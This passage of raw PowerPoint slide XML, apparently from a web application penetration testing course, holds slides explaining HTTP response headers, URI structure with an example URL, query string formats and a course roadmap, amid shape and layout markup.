              </a:rPr>
              <a:t>String returned by the web server identifying itself.  This can be spoofed or changed by the administrator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36875" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="4562475"/>
            <a:ext cx="3048000" cy="915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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Server Time: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Time stamp based on the server's time and date.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36876" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="5562600"/>
            <a:ext cx="30480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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Content Length: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Length of the response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36877" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4267200" y="3276600"/>
            <a:ext cx="1676400" cy="3810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6878" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4800600" y="4267200"/>
            <a:ext cx="1143000" cy="4572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6879" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2971800" y="4800600"/>
            <a:ext cx="2971800" cy="9144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6880" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5257800"/>
            <a:ext cx="2895600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Keep in mind </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the header ends </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with a blank line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19075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uniform Resource Identifier (URIs)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="1645920"/>
            <a:ext cx="8716962" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A URI is the address of a resource including how to retrieve it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The term Uniform Resource Locator (URL) is now used interchangeably by most people</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>URI contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>protocol://[user:password@]host.domainname[:port]/resource?param=value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consider:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>http://www.secureideas.com/index.php?id=42</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http is the protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>www.secureideas.com is the host.domainname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php is the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>id is a parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>42 is the value of id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19075" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Query String Formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1661160"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Query strings are used to pass data via a URL request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Popular target for attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Trivial to manipulate – they are in the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s location line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will analyze tools to manipulate them in a more flexible and automated fashion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The format of query parameters is determined by the web application developer and/or the production environment running the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typical format:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php?id=42&amp;name=Kevin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php/id/42/name/Kevin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s mod_rewrite module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php/id=42$name=Kevin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data parsed by server side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>index.php?param=id:42&amp;param=name:Kevin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Data used by an application executed using a system call in the web application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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
